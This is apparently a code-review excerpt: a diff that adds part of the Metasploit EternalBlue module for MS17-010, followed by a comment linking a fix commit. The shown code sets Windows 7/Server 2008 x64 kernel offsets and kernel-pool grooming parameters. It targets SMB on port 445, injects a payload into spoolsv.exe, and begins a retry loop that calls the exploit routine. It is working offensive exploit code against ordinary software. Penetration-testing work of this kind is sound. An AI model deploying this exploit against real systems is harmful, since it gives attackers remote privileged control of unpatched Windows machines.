modules/exploits/windows/smb/ms17_010_eternalblue.rb

```diff
@@ -0,0 +1,688 @@
+        DWORD is subtracted into a WORD. The kernel pool is groomed so that overflow
+        is well laid-out to overwrite an SMBv1 buffer. Actual RIP hijack is later
+        completed in srvnet!SrvNetWskReceiveComplete.
+
+        This exploit, like the original may not trigger 100% of the time, and should be
+        run continuously until triggered. It seems like the pool will get hot streaks
+        and need a cool down period before the shells rain in again.
+      },
+
+      'Author'         => [
+        'Sean Dillon <sean.dillon@risksense.com>',  # @zerosum0x0
+        'Dylan Davis <dylan.davis@risksense.com>',  # @jennamagius
+        'Equation Group',
+        'Shadow Brokers'
+       ],
+      'License'        => MSF_LICENSE,
+      'References'     =>
+        [
+          [ 'MSB', 'MS17-010' ],
+          [ 'CVE', '2017-0143' ],
+          [ 'CVE', '2017-0144' ],
+          [ 'CVE', '2017-0145' ],
+          [ 'CVE', '2017-0146' ],
+          [ 'CVE', '2017-0147' ],
+          [ 'CVE', '2017-0148' ],
+          [ 'URL', 'https://github.com/RiskSense-Ops/MS17-010' ]
+        ],
+      'DefaultOptions' =>
+        {
+          'EXITFUNC' => 'thread',
+        },
+      'Privileged'     => true,
+      'Payload'        =>
+        {
+          'Space'           => 2000,  # this can be more, needs to be recalculated
+          'EncoderType'     => Msf::Encoder::Type::Raw,
+        },
+      'Platform'       => 'win',
+      'Targets'        =>
+        [
+          [ 'Windows 7 and Server 2008 (x64) All Service Packs',
+            {
+              'Platform'       => 'win',
+              'Arch'           => [ ARCH_X64 ],
+
+              'ep_thl_b'       => 0x308,  # EPROCESS.ThreadListHead.Blink offset
+              'et_alertable'   => 0x4c,   # ETHREAD.Alertable offset
+              'teb_acp'        => 0x2c8,  # TEB.ActivationContextPointer offset
+              'et_tle'         => 0x420   # ETHREAD.ThreadListEntry offset
+            }
+          ],
+        ],
+      'DefaultTarget'  => 0,
+      'DisclosureDate' => 'Mar 14 2017'
+    ))
+
+    register_options(
+      [
+        Opt::RPORT(445),
+        OptString.new('ProcessName', [ true, 'Process to inject payload into.', 'spoolsv.exe' ]),
+        OptInt.new( 'MaxExploitAttempts', [ true,  "The number of times to retry the exploit.", 3 ] ),
+        OptInt.new( 'GroomAllocations', [ true,  "Initial number of times to groom the kernel pool.", 12 ] ),
+        OptInt.new( 'GroomDelta', [ true,  "The amount to increase the groom count by per try.", 5 ] )
+      ])
+  end
+
+  def check
+    # todo: create MS17-010 mixin, and hook up auxiliary/scanner/smb/smb_ms17_010
+  end
+
+  def exploit
+    begin
+      for i in 1..datastore['MaxExploitAttempts']
+
+        grooms = datastore['GroomAllocations'] + datastore['GroomDelta'] * (i - 1)
+
+        smb_eternalblue(datastore['ProcessName'], grooms)
+
+        # we don't need this sleep, and need to find a way to remove it
```

Comment:
Fixed in https://github.com/rapid7/metasploit-framework/pull/8381/commits/865a36068e8e734130f20cd4e4d9ec310cf8a7d5